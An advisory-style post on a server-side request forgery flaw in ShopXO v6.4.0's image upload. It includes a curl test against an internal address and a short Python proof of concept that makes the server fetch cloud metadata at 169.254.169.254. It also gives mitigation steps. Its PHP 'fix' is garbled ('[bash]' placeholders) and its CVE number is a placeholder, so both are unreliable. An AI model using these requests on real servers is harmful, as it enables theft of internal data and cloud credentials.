ShopXO, Server-Side Request Forgery (SSRF), CVE-2025-XXXX (Moderate)

By /

ShopXO v6.4.0 fails to properly validate user-supplied URLs during image uploads, allowing attackers to craft malicious requests that bypass security checks. The application fetches external images without restricting access to internal network endpoints, enabling SSRF. Attackers can abuse this to scan internal systems, interact with local services, or exfiltrate sensitive data. The vulnerability arises due to insufficient input sanitization in the `image_upload.php` component, where a crafted `src` parameter forces the server to make arbitrary HTTP/HTTPS requests.

DailyCVE Form

Platform: ShopXO
Version: v6.4.0
Vulnerability: SSRF via Image Upload
Severity: Moderate
Date: 2025-03-29

What Undercode Say:

Exploitation:

  1. Craft a malicious image URL pointing to internal endpoints (`http://localhost/admin`).

2. Upload via `image_upload.php` with `src` parameter manipulated.

3. Server fetches internal resources, exposing sensitive data.

Protection:

1. Implement strict URL whitelisting for image sources.

2. Disable `allow_url_fopen` in PHP config.

3. Use network-level restrictions to block internal requests.

Analytics:

  • Attack Vector: Remote, unauthenticated.
  • Impact: Data disclosure, internal reconnaissance.
  • Patch Status: Unpatched in v6.4.0.

Commands:

Check if vulnerable (CURL test):
curl -X POST -F "image=http://internal-ip/admin" http://shopxo/image_upload.php

Code Fix (PHP):

// Validate external URLs before processing
function isAllowedURL($url) {
$whitelist = [bash];
$parsed = parse_url($url);
return in_array($parsed[bash], $whitelist);
}

Mitigation Steps:

1. Update to ShopXO patched version (if available).

2. Deploy WAF rules to block SSRF patterns.

3. Audit server logs for suspicious outbound requests.

Exploit PoC:

import requests
target = "http://vulnerable-shopxo.com/image_upload.php"
malicious_url = "http://169.254.169.254/latest/meta-data"
requests.post(target, files={"image": (None, malicious_url)})

Log Analysis:

grep "image_upload.php" /var/log/apache2/access.log | grep "169.254.169.254"

References:

  • GitHub Advisory: GHSA-xxxx-xxxx-xxxx
  • NVD: CVE-2025-XXXX

References:

Reported By: https://github.com/advisories/GHSA-p736-g6pg-hjhw
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top